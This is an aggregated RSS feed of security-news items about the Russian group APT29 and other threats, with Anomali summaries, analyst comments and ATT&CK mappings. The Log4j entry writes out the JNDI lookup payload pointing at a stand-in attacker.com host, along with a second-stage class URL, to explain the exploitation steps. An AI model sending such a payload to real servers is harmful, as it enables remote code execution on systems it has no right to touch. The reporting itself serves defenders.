This is the RSS 2.0 feed from www.secnews.physaphae.fr. IT's a simple agragated flow of multiple articles soruces. Liste of sources, can be found on www.secnews.physaphae.fr. 2025-05-10T18:30:15+00:00 www.secnews.physaphae.fr The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-07-19T21:03:48+00:00 https://thehackernews.com/2022/07/russian-hackers-using-dropbox-and.html www.secnews.physaphae.fr/article.php?IdArticle=5827734 False None APT 29 None Security Affairs - Blog Secu Russia-linked threat actors APT29 are using the Google Drive cloud storage service to evade detection. Palo Alto Networks researchers reported that the Russia-linked APT29 group, tracked by the researchers as Cloaked Ursa, started using the Google Drive cloud storage service to evade detection. The Russia-linked APT29 group (aka SVR, Cozy Bear, and The Dukes) has been active since at least […] ]]> 2022-07-19T13:41:49+00:00 https://securityaffairs.co/wordpress/133409/apt/apt29-google-drive-dropbox.html www.secnews.physaphae.fr/article.php?IdArticle=5825713 False Threat APT 29 None Global Security Mag - Site de news francais Malwares]]> 2022-07-19T11:00:58+00:00 http://www.globalsecuritymag.fr/Les-pirates-russes-APT29-utilisent,20220719,128061.html www.secnews.physaphae.fr/article.php?IdArticle=5824317 False None APT 29 None CyberScoop - scoopnewsgroup.com special Cyber APT29, one of the SVR's most active and successful hacking groups, has been using the cloud service to help deliver malware, the researchers said. ]]> 2022-07-19T10:00:00+00:00 https://www.cyberscoop.com/apt29-google-drive-malware-spearphishing/ www.secnews.physaphae.fr/article.php?IdArticle=5823767 False None APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Targets of Interest | Russian Organizations Increasingly Under Attack By Chinese APTs (published: July 7, 2022) SentinelLabs researchers detected yet another China-sponsored threat group targeting Russia with a cyberespionage campaign. The attacks start with a spearphishing email containing Microsoft Office maldocs built with the Royal Road malicious document builder. These maldocs were dropping the Bisonal backdoor remote access trojan (RAT). Besides targeted Russian organizations, the same attackers continue targeting other countries such as Pakistan. This China-sponsored activity is attributed with medium confidence to Tonto Team (CactusPete, Earth Akhlut). Analyst Comment: Defense-in-depth (layering of security mechanisms, redundancy, fail-safe defense processes) is the best way to ensure safety from advanced persistent threats (APTs), including a focus on both network and host-based security. Prevention and detection capabilities should also be in place. Furthermore, all employees should be educated on the risks of spearphishing and how to identify such attempts. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 Tags: China, source-country:CN, Russia, target-country:RU, Ukraine, Pakistan, target-country:PK, Bisonal RAT, Tonto Team, APT, CactusPete, Earth Akhlut, Royal Road, 8.t builder, CVE-2018-0798 OrBit: New Undetected Linux Threat Uses Unique Hijack of Execution Flow (published: July 6, 2022) Intezer researchers describe a new Linux malware dubbed OrBit, that was fully undetected at the time of the discovery. This malware hooks functions and adds itself to all running processes, but it doesn’t use LD_PRELOAD as previously described Linux threats. Instead it achieves persistence by adding the path to the malware into the /etc/ld.so.preload and by patching the binary of the loader itself so it will load the malicious shared object. OrBit establishes an SSH connection, then stages and infiltrates stolen credentials. It avoids detection by multiple functions that show running processes or network connections, as it hooks these functions and filters their output. Analyst Comment: Defenders are advised to use network telemetry to detect anomalous SSH traffic associated with OrBit exfiltration attempts. Consider network segmentation, storing sensitive data offline, and deploying security solutions as statically linked executables. MITRE ATT&CK: [MITRE ATT&CK] Hijack Execution Flow - T1574 | [MITRE ATT&CK] Hide Artifacts - T1564 | ]]> 2022-07-11T22:59:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-brute-ratel-c4-framework-abused-to-avoid-detection-orbit-kernel-malware-patches-linux-loader-hive-ransomware-gets-rewritten-and-more www.secnews.physaphae.fr/article.php?IdArticle=5664956 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching APT 29 None The Register - Site journalistique Anglais 2022-07-06T05:27:10+00:00 https://go.theregister.com/feed/www.theregister.com/2022/07/06/brc4_state_sponsored_apt29/ www.secnews.physaphae.fr/article.php?IdArticle=5573916 False Malware,Tool,Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Attackers Are Attempting to Exploit Critical F5 BIG-IP RCE (published: May 9, 2022) CVE-2022-1388, a critical remote code execution vulnerability affecting F5 BIG-IP multi-purpose networking devices/modules, was made public on May 4, 2022. It is of high severity (CVSSv3 score is 9.8). By May 6, 2022, multiple researchers have developed proof-of concept (PoC) exploits for CVE-2022-1388. The first in-the-wild exploitation attempts were reported on May 8, 2022. Analyst Comment: Update your vulnerable F5 BIG-IP versions 13.x and higher. BIG-IP 11.x and 12.x will not be fixed, but temporary mitigations available: block iControl REST access through the self IP address and through the management interface, modify the BIG-IP httpd configuration. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 Tags: CVE-2022-1388, F5, Vulnerability, Remote code execution, Missing authentication Mobile Subscription Trojans and Their Little Tricks (published: May 6, 2022) Kaspersky researchers analyzed five Android trojans that are secretly subscribing users to paid services. Jocker trojan operators add malicious code to legitimate apps and re-upload them to Google Store under different names. To avoid detection, malicious functionality won’t start until the trojan checks that it is available in the store. The malicious payload is split in up to four files. It can block or substitute anti-fraud scripts, and modify X-Requested-With header in an HTTP request. Another Android malware involved in subscription fraud, MobOk trojan, has additional functionality to bypass captcha. MobOk was seen in a malicious app in Google Store, but the most common infection vector is being spread by other Trojans such as Triada. Analyst Comment: Limit your apps to downloads from the official stores (Google Store for Android), avoid new apps with low number of downloads and bad reviews. Pay attention to the terms of use and payment. Avoid granting it too many permissions if those are not crucial to the app alleged function. Monitor your balance and subscription list. MITRE ATT&CK: [MITRE ATT&CK] Ingress Tool Transfer - T1105 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Data Manipulation - T1565 Tags: Android, Jocker, MobOk, Triada, Vesub, GriftHorse, Trojan, Subscription fraud, Subscription Trojan, Russia, target-country:RU, Middle East, Saudi Arabia, target-country:SA, Egypt, target-country:EG, Thailand, target-country:TH Raspberry Robin Gets the Worm Early (published: May 5, 2022) Since September 2021, Red Canary researchers monitor Raspberry Robin, a new worm]]> 2022-05-10T17:08:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-moshen-dragon-abused-anti-virus-software-raspberry-robin-worm-jumps-from-usb-unc3524-uses-internet-of-things-to-steal-emails-and-more www.secnews.physaphae.fr/article.php?IdArticle=4573852 False Ransomware,Malware,Tool,Vulnerability,Threat APT 29,APT 28 3.0000000000000000 knowbe4 - cybersecurity services Researchers at Recorded Future's Insikt Group warn that the Russian threat actor NOBELIUM (also known as APT29 or Cozy Bear) is using typosquatting domains to target the news and media industries with phishing pages.]]> 2022-05-05T13:08:59+00:00 https://blog.knowbe4.com/cozy-bear-goes-typosquatting www.secnews.physaphae.fr/article.php?IdArticle=4548962 False Threat APT 29 None TechRepublic - Security News US 2022-05-03T15:43:28+00:00 https://www.techrepublic.com/article/russian-hacker-group-apt29-targeting-diplomats/ www.secnews.physaphae.fr/article.php?IdArticle=4538684 False None APT 29 None SecurityWeek - Security News 2022-05-03T10:08:45+00:00 https://www.securityweek.com/russian-cyberspies-target-diplomats-new-malware www.secnews.physaphae.fr/article.php?IdArticle=4537052 False Malware APT 29 None Mandiant - Blog Sécu de Mandiant UPDATE (November 2022): We have merged UNC3524 with APT29. The UNC3524 activity described in this post is now attributed to APT29. Since December 2019, Mandiant has observed advanced threat actors increase their investment in tools to facilitate bulk email collection from victim environments, especially as it relates to their support of suspected espionage objectives. Email messages and their attachments offer a rich source of information about an organization, stored in a centralized location for threat actors to collect. Most email systems, whether on-premises or in the cloud, offer]]> 2022-05-02T09:30:00+00:00 https://www.mandiant.com/resources/blog/unc3524-eye-spy-email www.secnews.physaphae.fr/article.php?IdArticle=8377467 False Tool,Threat APT 29 2.0000000000000000 Security Affairs - Blog Secu 2022-05-02T05:34:39+00:00 https://securityaffairs.co/wordpress/130787/apt/apt29-targets-diplomats.html www.secnews.physaphae.fr/article.php?IdArticle=4531546 False None APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-05-02T04:40:01+00:00 https://thehackernews.com/2022/05/russian-hackers-targeting-diplomatic.html www.secnews.physaphae.fr/article.php?IdArticle=4532409 False Threat APT 29 None Mandiant - Blog Sécu de Mandiant Parrainé par le Foreign Intelligence Service (SVR).Le ciblage diplomatique centré sur ce récent

---

Since early 2021, Mandiant has been tracking extensive APT29 phishing campaigns targeting diplomatic organizations in Europe, the Americas, and Asia. This blog post discusses our recent observations related to the identification of two new malware families in 2022, BEATDROP and BOOMMIC, as well as APT29\'s efforts to evade detection through retooling and abuse of Atlassian\'s Trello service. APT29 is a Russian espionage group that Mandiant has been tracking since at least 2014 and is likely sponsored by the Foreign Intelligence Service (SVR). The diplomatic-centric targeting of this recent]]> 2022-04-28T12:00:00+00:00 https://www.mandiant.com/resources/blog/tracking-apt29-phishing-campaigns www.secnews.physaphae.fr/article.php?IdArticle=8377468 False Malware APT 29,APT 29 4.0000000000000000 Mandiant - Blog Sécu de Mandiant Solarwinds Compromis en décembre 2020 , est attribuable à APT29. Cette conclusion correspond aux instructions d'attribution précédemment faites par le u.s.Gouvernement que le compromis de la chaîne d'approvisionnement de Solarwinds a été réalisé par APT29, un groupe d'espionnage basé en Russie évalué comme parrainé par le Russian Foreign Intelligence Service (SVR).Notre évaluation est basée sur des données de première main recueillies par Mandiant et est le résultat d'une comparaison et d'une revue approfondies de UNC2452 et de notre ]]> 2022-04-27T09:00:00+00:00 https://www.mandiant.com/resources/blog/unc2452-merged-into-apt29 www.secnews.physaphae.fr/article.php?IdArticle=8377472 False None Solardwinds,APT 29,APT 29 3.0000000000000000 knowbe4 - cybersecurity services Attackers are spamming multifactor authentication (MFA) prompts in an attempt to irritate users into approving the login, Ars Technica reports. Both criminal and nation-state actors are using this technique. Researchers at Mandiant observed the Russian state-sponsored actor Cozy Bear launching repeated MFA prompts until the user accepted the request.]]> 2022-04-18T12:42:15+00:00 https://blog.knowbe4.com/being-annoying-as-a-social-engineering-approach www.secnews.physaphae.fr/article.php?IdArticle=4470685 False None APT 29,APT 29 None Schneier on Security - Chercheur Cryptologue Américain increasingly popular: …some forms of MFA are stronger than others, and recent events show that these weaker forms aren’t much of a hurdle for some hackers to clear. In the past few months, suspected script kiddies like the Lapsus$ data extortion gang and elite Russian-state threat actors (like Cozy Bear, the group behind the SolarWinds hack) have both successfully defeated the protection. […] Methods include: Sending a bunch of MFA requests and hoping the target finally accepts one to make the noise stop. ...]]> 2022-04-01T11:12:27+00:00 https://www.schneier.com/blog/archives/2022/04/bypassing-two-factor-authentication.html www.secnews.physaphae.fr/article.php?IdArticle=4378460 False Threat APT 29 None Ars Technica - Risk Assessment Security Hacktivism 2022-03-19T10:45:49+00:00 https://arstechnica.com/?p=1842163 www.secnews.physaphae.fr/article.php?IdArticle=4308724 False Ransomware APT 29 None Fortinet ThreatSignal - Harware Vendor 2022-03-15T13:20:59+00:00 https://fortiguard.fortinet.com/threat-signal-report/4450 www.secnews.physaphae.fr/article.php?IdArticle=4287368 True Malware,Threat APT 29 None Anomali - Firm Blog Endnotes [1] “Attack on Ukrainian Government Websites Linked to GRU Hackers,” Bellingcat Investigation Team, accessed February 24, 2022, published February 23, 2022, https://www.bellingcat.com/news/2022/02/23/attack-on-ukrainian-government-websites-linked-to-russian-gru-hackers/; Joe Tidy “​​Ukraine crisis: 'Wiper' discovered in latest cyber-attacks,” BBC News, accessed February 24, 2022, published February 24, 2022, https://www.bbc.com/news/technology-60500618. [2] “Treasury Sanctions Evil Corp, the Russia-Based Cybercriminal Group Behind Dridex Malware,” The U.S. Department of the Treasury, accessed February 24, 2022, published December 5, 2019, https://home.treasury.gov/news/press-releases/sm845.]]> 2022-02-25T00:05:00+00:00 https://www.anomali.com/blog/anomali-threat-research-provides-russian-cyber-activity-dashboard www.secnews.physaphae.fr/article.php?IdArticle=4180205 False Threat,Guideline APT 29,APT 29,APT 28 None Fortinet ThreatSignal - Harware Vendor 2022-02-23T18:34:00+00:00 https://fortiguard.fortinet.com/threat-signal-report/4425 www.secnews.physaphae.fr/article.php?IdArticle=4175593 False Malware,Threat APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) 2022-02-09T02:46:33+00:00 https://thehackernews.com/2022/02/russian-apt-hackers-used-covid-19-lures.html www.secnews.physaphae.fr/article.php?IdArticle=4098768 False Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence New CapraRAT Android Malware Targets Indian Government and Military Personnel (published: February 7, 2022) Trend Micro researchers have discovered a new remote access trojan (RAT) dubbed, CapraRAT, that targets Android systems. CapraRAT is attributed to the advanced persistent threat (APT) group, APT36 (Earth Karkaddan, Mythic Leopard, Transparent Tribe), which is believed to be Pakistan-based group that has been active since at least 2016. The Android-targeting CapraRAT shares similarities (capabilities, commands, and function names) to the Windows targeting Crimson RAT, and researchers note that it may be a modified version of the open source AndroRAT. The delivery method of CapraRAT is unknown, however, APT36 is known to use spearphishing emails with attachments or links. Once CapraRAT is installed and executed it will attempt to reach out to a command and control server and subsequently begin stealing various data from an infected device. Analyst Comment: It is important to only use the Google Play Store to obtain your software (for Android users), and avoid installing software from unverified sources because it is easier for malicious applications to get into third-party stores. Applications that ask for additional permissions outside of their normal functionality should be treated with suspicion, and normal functionality for the applications should be reviewed carefully prior to installation. Antivirus applications, if available, should be installed devices. MITRE ATT&CK: [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] User Execution - T1204 | [MITRE ATT&CK] Software Deployment Tools - T1072 Tags: APT36, Earth Karkaddan, Mythic Leopard, Transparent Tribe, Android, CapraRAT Russia’s Gamaredon aka Primitive Bear APT Group Actively Targeting Ukraine (published: February 3, 2022) The Russia-sponsored, cyberespionage group Primitive Bear (Gamaredon) has continued updating its toolset, according to Unit 42 researchers. The group continues to use their primary tactic in spearphishing emails with attachments that leverage remote templates and template injection with a focus on Ukraine. These email attachments are usually Microsoft Word documents that use the remote template to fetch VBScript, execute it to establish persistence, and wait for the group’s instruction via a command and control server. Unit 42 researchers have analyzed the group’s activity and infrastructure dating back to 2018 up to the current border tensions between Russia and Ukraine. The infrastructure behind the campaigns is robust, with clusters of domains that are rotated and parked on different IPs, often on a daily basis. Analyst Comment: Spearphishing emails represent a significant security risk because the sending email will often appear legitimate to the target; sometimes a target company email is compromis]]> 2022-02-08T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-conti-ransomware-attack-iran-sponsored-apts-new-android-rat-russia-sponsored-gamaredon-and-more www.secnews.physaphae.fr/article.php?IdArticle=4094313 False Ransomware,Malware,Threat,Conference APT 35,APT 35,APT 29,APT 29,APT 36 2.0000000000000000 Bleeping Computer - Magazine Américain 2022-01-27T09:23:25+00:00 https://www.bleepingcomputer.com/news/security/russian-apt29-hackers-stealthy-malware-undetected-for-years/ www.secnews.physaphae.fr/article.php?IdArticle=4041393 False Malware APT 29 None CrowdStrike - CTI Society 2022-01-27T08:00:06+00:00 https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/ www.secnews.physaphae.fr/article.php?IdArticle=4040759 False None Solardwinds,Solardwinds,APT 29,APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Earth Lusca Employs Sophisticated Infrastructure, Varied Tools and Techniques (published: January 17, 2022) The Earth Lusca threat group is part of the Winnti cluster. It is one of different Chinese groups that share aspects of their tactics, techniques, and procedures (TTPs) including the use of Winnti malware. Earth Lusca were active throughout 2021 committing both cyberespionage operations against government-connected organizations and financially-motivated intrusions targeting gambling and cryptocurrency-related sectors. For intrusion, the group tries different ways in including: spearphishing, watering hole attacks, and exploiting publicly facing servers. Cobalt Strike is one of the group’s preferred post-exploitation tools. It is followed by the use of the BioPass RAT, the Doraemon backdoor, the FunnySwitch backdoor, ShadowPad, and Winnti. The group employs two separate infrastructure clusters, first one is rented Vultr VPS servers used for command-and-control (C2), second one is compromised web servers used to scan for vulnerabilities, tunnel traffic, and Cobalt Strike C2. Analyst Comment: Earth Lusca often relies on tried-and-true techniques that can be stopped by security best practices, such as avoiding clicking on suspicious email/website links and or reacting on random banners urging to update important public-facing applications. Don’t be tricked to download Adobe Flash update, it was discontinued at the end of December 2020. Administrators should keep their important public-facing applications (such as Microsoft Exchange and Oracle GlassFish Server) updated. MITRE ATT&CK: [MITRE ATT&CK] Drive-by Compromise - T1189 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Scheduled Task - T1053 | [MITRE ATT&CK] System Services - T1569 | [MITRE ATT&CK] Windows Management Instrumentation - T1047 | [MITRE ATT&CK] Account Manipulation - T1098 | [MITRE ATT&CK] BITS Jobs - T1197 | [MITRE ATT&CK] Create Account - T1136 | [MITRE ATT&CK] Create or Modify System Process - T1543 | [MITRE ATT&CK] External Remote Services - T1133 | [MITRE ATT&CK] Hijack Execution Flow]]> 2022-01-19T22:45:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russia-sponsored-cyber-threats-china-based-earth-lusca-active-in-cyberespionage-and-cybertheft-bluenoroff-hunts-cryptocurrency-related-businesses-and-more www.secnews.physaphae.fr/article.php?IdArticle=3999162 False Ransomware,Malware,Tool,Vulnerability,Threat,Patching,Guideline APT 41,APT 38,APT 29,APT 28,APT 28 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Countless Servers Are Vulnerable to Apache Log4j Zero-Day Exploit (published: December 10, 2021) A critical vulnerability, registered as CVE-2021-44228, has been identified in Apache Log4j 2, which is an open source Java package used to enable logging in. The Apache Software Foundation (ASF) rates the vulnerability as a 10 on the common vulnerability scoring system (CVSS) scale. Cisco Talos has observed malicious activity related to CVE-2021-44228 beginning on December 2, 2021. This vulnerability affects millions of users and exploitation proof-of-concept code exists via LunaSec explains how to exploit it in five simple steps. These include: 1: Data from the User gets sent to the server (via any protocol). 2: The server logs the data in the request, containing the malicious payload: ${jndi:ldap://attacker.com/a} (where attacker.com is an attacker controlled server). 3: The Log4j vulnerability is triggered by this payload and the server makes a request to attacker.com via "Java Naming and Directory Interface" (JNDI). 4: This response contains a path to a remote Java class file (ex. http://second-stage.attacker.com/Exploit.class) which is injected into the server process. 5: This injected payload triggers a second stage, and allows an attacker to execute arbitrary code. Analyst Comment: Log4j version 2.15.0 has been released to address this vulnerability, however, it only changes a default setting (log4j2.formatMsgNoLookups) from false to true. This means that if the setting is set back to false, Log4j will again be vulnerable to exploitation. The initial campaigns could have been detected by filtering on certain keywords such as "ldap", "jndi", but this detection method is easily bypassable. MITRE ATT&CK: [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Exploitation for Client Execution - T1203 | [MITRE ATT&CK] Command and Scripting Interpreter - T1059 | [MITRE ATT&CK] Remote Services - T1021 | [MITRE ATT&CK] OS Credential Dumping - T1003 | [MITRE ATT&CK] Resource Hijacking - T1496 | [MITRE ATT&CK] Network Denial of Service - T1498 Tags: Log4j, CVE-2021-44228, Log4j2, Log4Shell, Apache, Zero-day, Java, Jndi, Class file Over a Dozen Malicious NPM Packages Caught Hijacking Discord Servers (published: December 8, 2021) Researchers from the DevOps firm JFrog has found at least 17 malicious packages on the open source npm Registry for JavaScript. The names of the packages are: prerequests-xcode (version 1.0.4), discord-selfbot-v14 (version 12.0.3), discord-lofy (version 11.5.1), discordsystem (version 11.5.1), discord-vilao (version 1.0.0), fix-error (version 1]]> 2021-12-15T16:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-apache-log4j-zero-day-exploit-google-fighting-glupteba-botnet-vixen-panda-targets-latin-america-and-europe-and-more www.secnews.physaphae.fr/article.php?IdArticle=3800465 False Malware,Tool,Vulnerability,Threat,Cloud APT 37,APT 29,APT 15,APT 15,APT 25 None Security Affairs - Blog Secu 2021-12-07T07:54:37+00:00 https://securityaffairs.co/wordpress/125352/apt/nobelium-custom-malware.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-custom-malware www.secnews.physaphae.fr/article.php?IdArticle=3755876 False Malware,Threat APT 29 None Security Affairs - Blog Secu 2021-12-06T22:31:02+00:00 https://securityaffairs.co/wordpress/125342/apt/nobelium-targets-french-orgs.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-targets-french-orgs www.secnews.physaphae.fr/article.php?IdArticle=3754433 False None APT 29 None Mandiant - Blog Sécu de Mandiant fusionné unc2452 avec apt29 .L'activité UNC2452 décrite dans ce post est désormais attribuée à APT29. comme anniversaire d'un an de la découverte du Chaîne d'approvisionnement Solarwinds Passe de compromis, mandiant reste engagé à être engagé à être engagé à être engagé à engagerSuivre l'un des acteurs les plus difficiles que nous ayons rencontrés.Ces acteurs russes présumés pratiquent la sécurité opérationnelle de premier ordre et les métiers avancés.Cependant, ils sont faillibles et nous continuons à découvrir leur activité et à apprendre de leurs erreurs.En fin de compte, ils restent une menace adaptable et évolutive qui doit être étroitement étudiée par

---

UPDATE (May 2022): We have merged UNC2452 with APT29. The UNC2452 activity described in this post is now attributed to APT29. As the one-year anniversary of the discovery of the SolarWinds supply chain compromise passes, Mandiant remains committed to tracking one of the toughest actors we have encountered. These suspected Russian actors practice top-notch operational security and advanced tradecraft. However, they are fallible, and we continue to uncover their activity and learn from their mistakes. Ultimately, they remain an adaptable and evolving threat that must be closely studied by]]> 2021-12-06T10:00:00+00:00 https://www.mandiant.com/resources/blog/russian-targeting-gov-business www.secnews.physaphae.fr/article.php?IdArticle=8377522 False Threat Solardwinds,APT 29 3.0000000000000000 Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence BlackMatter: New Data Exfiltration Tool Used in Attacks (published: November 1, 2021) Symantec researchers have discovered a custom data exfiltration tool, dubbed Exmatter, being used by the BlackMatter ransomware group. The same group has also been responsible for the Darkside ransomware - the variant that led to the May 2021 Colonial Pipeline outage. Exmatter is compiled as a .NET executable and obfuscated. This tool is designed to steal sensitive data and upload it to an attacker-controlled server prior to deployment of the ransomware as fast as possible. The speed is achieved via multiple filtering mechanisms: directory exclusion list, filetype whitelist, excluding files under 1,024 bytes, excluding files with certain attributes, and filename string exclusion list. Exmatter is being actively developed as three newer versions were found in the wild. Analyst Comment: Exmatter exfiltration tool by BlackMatter is following two custom data exfiltration tools linked to the LockBit ransomware operation. Attackers try to narrow down data sources to only those deemed most profitable or business-critical to speed up the whole exfiltration process. It makes it even more crucial for defenders to be prepared to quickly stop any detected exfiltration operation. MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048 Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations (published: October 31, 2021) Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went to state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei. Analyst Comment: Iran has not provided evidence behind the attribution, so]]> 2021-11-02T15:00:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-russian-intelligence-targets-it-providers-malspam-abuses-squid-games-another-npm-library-compromise-and-more www.secnews.physaphae.fr/article.php?IdArticle=3598623 False Ransomware,Malware,Tool,Threat,Guideline APT 29,APT 29 None Security Affairs - Blog Secu 2021-10-25T11:41:33+00:00 https://securityaffairs.co/wordpress/123754/apt/nobelium-apt-it-supply-chain.html?utm_source=rss&utm_medium=rss&utm_campaign=nobelium-apt-it-supply-chain www.secnews.physaphae.fr/article.php?IdArticle=3559032 False None APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report (published: October 7, 2021) Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to the Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium) associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate comparing year to year. They achieve it by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills with the cloud environment targeting. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53% – largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%). Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused back to gaining access to and harvesting intelligence. The scale and growing effectiveness of the cyberespionage requires a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions. MITRE ATT&CK: [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Brute Force - T1110 Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran Ransomware in the CIS (published: October 7, 2021) Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS) - and they avoid targeting this region. Still, businesses in the CIS are under the risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. Most of them were mainly distributed via the cracking of Remote Deskto]]> 2021-10-12T17:41:00+00:00 https://www.anomali.com/blog/anomali-cyber-watch-aerospace-and-telecoms-targeted-by-iranian-malkamak-group-cozy-bear-refocuses-on-cyberespionage-wicked-panda-is-traced-by-malleable-c2-profiles-and-more www.secnews.physaphae.fr/article.php?IdArticle=3505382 False Ransomware,Malware,Tool,Threat,Guideline,Prediction APT 41,APT 41,APT 39,APT 29,APT 29,APT 28 None Security Affairs - Blog Secu 2021-07-31T18:00:04+00:00 https://securityaffairs.co/wordpress/120704/cyber-warfare-2/solarwinds-hackers-breached-state-attorneys-offices.html?utm_source=rss&utm_medium=rss&utm_campaign=solarwinds-hackers-breached-state-attorneys-offices www.secnews.physaphae.fr/article.php?IdArticle=3155911 False None APT 29 None SecurityWeek - Security News 2021-07-30T15:25:25+00:00 http://feedproxy.google.com/~r/securityweek/~3/fj3gvAcPmps/russias-apt29-still-actively-delivering-malware-used-covid-19-vaccine-spying www.secnews.physaphae.fr/article.php?IdArticle=3152083 False Malware APT 29,APT 29 None The Hacker News - The Hacker News est un blog de news de hack (surprenant non?) ]]> 2021-07-30T03:00:54+00:00 http://feedproxy.google.com/~r/TheHackersNews/~3/OGQmE6b-OF4/experts-uncover-several-c-servers.html www.secnews.physaphae.fr/article.php?IdArticle=3150978 False Malware,Threat APT 29 None Kaspersky - Kaspersky Research blog 2021-07-29T10:00:46+00:00 https://securelist.com/apt-trends-report-q2-2021/103517/ www.secnews.physaphae.fr/article.php?IdArticle=3147332 False Threat APT 29,APT 31 None Graham Cluley - Blog Security 2021-07-01T10:47:40+00:00 https://grahamcluley.com/smashing-security-podcast-234/ www.secnews.physaphae.fr/article.php?IdArticle=3005154 False None APT 29 None Security Affairs - Blog Secu 2021-06-26T16:36:51+00:00 https://securityaffairs.co/wordpress/119425/apt/solarwinds-nobelium-ongoing-campaign.html?utm_source=rss&utm_medium=rss&utm_campaign=solarwinds-nobelium-ongoing-campaign www.secnews.physaphae.fr/article.php?IdArticle=2986501 False Threat APT 29 None Anomali - Firm Blog Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed. Trending Cyber News and Threat Intelligence TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations (published: June 4, 2021) Researchers at Palo Alto have identified a malware repo belonging to TeamTNT, the prominent cloud focused threat group. The repo shows the expansion of TeamTNTs abilities, and includes scripts for scraping SSH keys, AWS IAM credentials and searching for config files that contain credentials. In addition to AWS credentials, TeamTNT are now also searching for Google Cloud credentials, which is the first instance of the group expanding to GCP. Analyst Comment: Any internal only cloud assets & SSH/Privileged access for customer facing cloud infrastructure should only be accessible via company VPN. This ensures attackers don’t get any admin access from over the internet even if keys or credentials are compromised. Customers should monitor compromised credentials in public leaks & reset the passwords immediately for those accounts. MITRE ATT&CK: [MITRE 